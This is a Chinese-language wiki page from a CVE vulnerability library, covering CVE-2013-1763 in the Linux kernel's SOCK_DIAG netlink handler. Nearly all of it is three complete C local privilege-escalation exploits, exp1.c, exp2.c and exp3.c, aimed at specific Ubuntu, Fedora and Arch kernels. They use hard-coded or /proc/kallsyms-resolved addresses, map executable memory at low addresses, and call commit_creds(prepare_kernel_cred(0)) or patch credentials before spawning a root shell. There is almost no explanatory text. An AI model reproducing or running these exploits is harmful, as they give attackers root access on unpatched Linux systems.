用户工具

站点工具


cve_漏洞库:cve-2013-1763
exp1.c
/* 
* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
* bug found by Spender
* poc by SynQ
* 
* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
* using nl_table->hash.rehash_time, index 81
* 
* Fedora 18 support added
* 
* 2/2013
*/
 
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>
 
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
 
int __attribute__((regparm(3)))
kernel_code()
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}
 
int jump_payload_not_used(void *skb, void *nlh)
{
    asm volatile (
        "mov $kernel_code, %eax\n"
        "call *%eax\n"
    );
}
 
unsigned long
get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy, sym[512];
    int ret = 0;
 
    f = fopen("/proc/kallsyms", "r");
    if (!f) {
        return 0;
    }
 
    while (ret != EOF) {
        ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
        if (ret == 0) {
            fscanf(f, "%s\n", sym);
            continue;
        }
        if (!strcmp(name, sym)) {
            printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
            fclose(f);
            return addr;
        }
    }
    fclose(f);
 
    return 0;
}
 
int main(int argc, char*argv[])
{
    int fd;
    unsigned family;
    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;
    char    buf[8192];
 
    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
        printf("Can't create sock diag socket\n");
        return -1;
    }
 
    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
    req.nlh.nlmsg_seq = 123456;
 
    //req.r.sdiag_family = 89;
    req.r.udiag_states = -1;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
 
    if(argc==1){
        printf("Run: %s Fedora|Ubuntu\n",argv[0]);
        return 0;
    }
    else if(strcmp(argv[1],"Fedora")==0){
      commit_creds = (_commit_creds) get_symbol("commit_creds");
      prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
      sock_diag_handlers = get_symbol("sock_diag_handlers");
      nl_table = get_symbol("nl_table");
 
      if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
        printf("some symbols are not available!\n");
        exit(1);
        }
 
      family = (nl_table - sock_diag_handlers) / 4;
      printf("family=%d\n",family);
      req.r.sdiag_family = family;
 
      if(family>255){
        printf("nl_table is too far!\n");
        exit(1);
        }
    }
    else if(strcmp(argv[1],"Ubuntu")==0){
      commit_creds = (_commit_creds) 0xc106bc60;
      prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
      req.r.sdiag_family = 81;
    }
 
    unsigned long mmap_start, mmap_size;
    mmap_start = 0x10000;
    mmap_size = 0x120000;
    printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);
 
        if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
                printf("mmap fault\n");
                exit(1);
        }
    memset((void*)mmap_start, 0x90, mmap_size);
 
    char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm
    unsigned long *asd = &jump[4];
    *asd = (unsigned long)kernel_code;
 
    memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));
 
    if ( send(fd, &req, sizeof(req), 0) < 0) {
        printf("bad send\n");
        close(fd);
        return -1;
    }
 
    printf("uid=%d, euid=%d\n",getuid(), geteuid() );
 
    if(!getuid())
        system("/bin/sh");
 
}
exp2.c
// archer.c
//
// 2012 [email protected]
//
// Works reliably against x86-64 3.3-3.7 arch.
//
// Tested against:
//
// Linux XXX 3.3.1-1-ARCH #1 SMP PREEMPT Tue Apr 3 06:46:17 UTC 2012 x86_64 GNU/Linux
// Linux XXX 3.4.7-1-ARCH #1 SMP PREEMPT Sun Jul 29 22:02:56 CEST 2012 x86_64 GNU/Linux
// Linux XXX 3.7.4-1-ARCH #1 SMP PREEMPT Mon Jan 21 23:05:29 CET 2013 x86_64 GNU/Linux
// ...
 
#include <assert.h>
 
#define JUMP  0x0000100000001000LL
#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
 
static long ugid;
 
void patch_current() {
        int i,j,k;
        char *current = *(char**)(((long)&i) & (-8192));
        long kbase = ((long)current)>>36;
 
        for (i=0; i<4000; i+=4) {
                long *p = (void *)&current[i];
                int *t = (void*) p[0];
                if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
                for (j=0; j<20; j++) {
      for (k = 0; k < 8; k++)
                          if (((int*)&ugid)[k%2] != t[j+k]) goto next;
                        for (i = 0; i < 8; i++) t[j+i] = 0;
                        for (i = 0; i < 10; i++) t[j+9+i] = -1;
                        return;
next:;          }
        }
}
 
 
int main()
{
  long u = getuid();
  long g = getgid();
  int i, f = socket(16,3,4);
  static int n[10] = {40,0x10014,0,0,45,-1};
 
  assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1);
 
  setresuid(u,u,u); setresgid(g,g,g);
  ugid = (g<<32)|u;
 
  memcpy(1<<12, &patch_current, 1024);
  for (i = 0; i < (1<<17); i++) ((void**)(1<<12))[i] = &patch_current;
  send(f, n, sizeof(n), 0);
  setuid(0);
  return execl("/bin/bash", "-sh", 0);
}
exp3.c
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>
 
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
 
int __attribute__((regparm(3)))
x()
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}
 
char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
 
int main() {
    int fd;
    unsigned long mmap_start, mmap_size = 0x10000;
    unsigned family;
    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;
    char    buf[8192];
 
    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
        printf("Can't create sock diag socket\n");
        return -1;
    }
 
    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
    req.nlh.nlmsg_seq = 123456;
 
    req.r.udiag_states = -1;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
 
    /* Ubuntu 12.10 x86_64 */
    req.r.sdiag_family = 0x37;
    commit_creds = (_commit_creds) 0xffffffff8107d180;
    prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
    mmap_start = 0x1a000;
 
    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
        MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
 
        printf("mmap fault\n");
        exit(1);
    }
 
    *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
    memset((void *)mmap_start, 0x90, mmap_size);
    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));
 
    send(fd, &req, sizeof(req), 0);
    if(!getuid())
        system("/bin/sh");
}
你需要登录发表评论。
cve_漏洞库/cve-2013-1763 · 最后更改: 2017/07/31 15:28

页面工具